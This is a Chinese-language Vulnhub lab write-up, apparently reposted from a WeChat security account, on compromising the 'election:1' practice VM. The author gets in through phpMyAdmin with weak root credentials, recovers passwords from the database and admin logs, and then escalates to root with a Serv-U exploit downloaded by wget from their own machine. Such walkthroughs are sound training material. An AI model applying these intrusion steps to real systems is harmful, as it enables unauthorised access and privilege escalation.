Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

admin 2024年10月13日21:44:58评论12 views字数 951阅读3分10秒阅读模式
Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

点击上方蓝字关注我们

0x00:靶机介绍

这次的靶机是靶机是election:1下载地址是http://www.vulnhub.com/entry/election-1,503/

号称有OSCP中等难度。总结来说就是phpmyadmin 弱密码登录,到处转挖信息,SSH登录最后一个CVE漏洞提权。

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

0x01:信息收集

还是一如既往的python autorecon摸鱼启动等做完以后才发觉居然也开了139和445端口。默认有22和80端口。

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Gobuster居然扫到phpinfo, phpmyadmin这些稀客,还有个robots.txt的文件

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

这里先看看robots.txt,第一眼看到wordpress我还以为是个CMS站点渗透结果太天真了。

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

打开页面一看是个投票的网站。。。。。

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

这里顺便用dirsearch扫到一个admin后台等下可以过去瞅瞅

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

0x02:弱密码溜进phpmyadmin挖掘信息

打开phpmyadmin这里一开始我是rootroot尝试失败,然后换成root toor就直接登录进去了还没缓过神来就进去了。。。。

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

在来到tb_panitia这里看到有个love的账号密码先解密,等下也许会用到

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

最后得到一个密码Zxc123!@#

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

此时去到我们的/admin后台输入唯一能找到的ID 1234 然后输入刚才解密出来的密码

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

成功进入后台。

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

0x03:挖掘后台信息

这个后台其实设置的比较简单,连文件管理功能都没有裂开。。。.直到我点开Settings,有个systeminfo 里面有个view LOGS

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

哦吼又找到一个密码有点像用户可以考虑SSH连接

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

登录成功

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

0x04:提权

这里用find找特殊权限的时候居然看到有一个Serv-U

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

这里去到它的目录下可以看到波版本信息为15.1

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

再用searchsploit Serv-U找到一个<15.1.7的通杀后面也看到应该是一个通杀CVE脚本来的

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

这里在kali本地开启波python共享模式把相关PAYLOAD传过去

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

然后在靶机上用wget http://kali IP:8082 把它下载过来

最后根据exploitdb的使用方法绝杀一步到位提权变成root

Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

原文始发于微信公众号(神隐攻防实验室):Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日21:44:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub: election1(OSCP中级难度,phpmyadmin提权,旧版CVE通杀提权)https://cn-sec.com/archives/787935.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息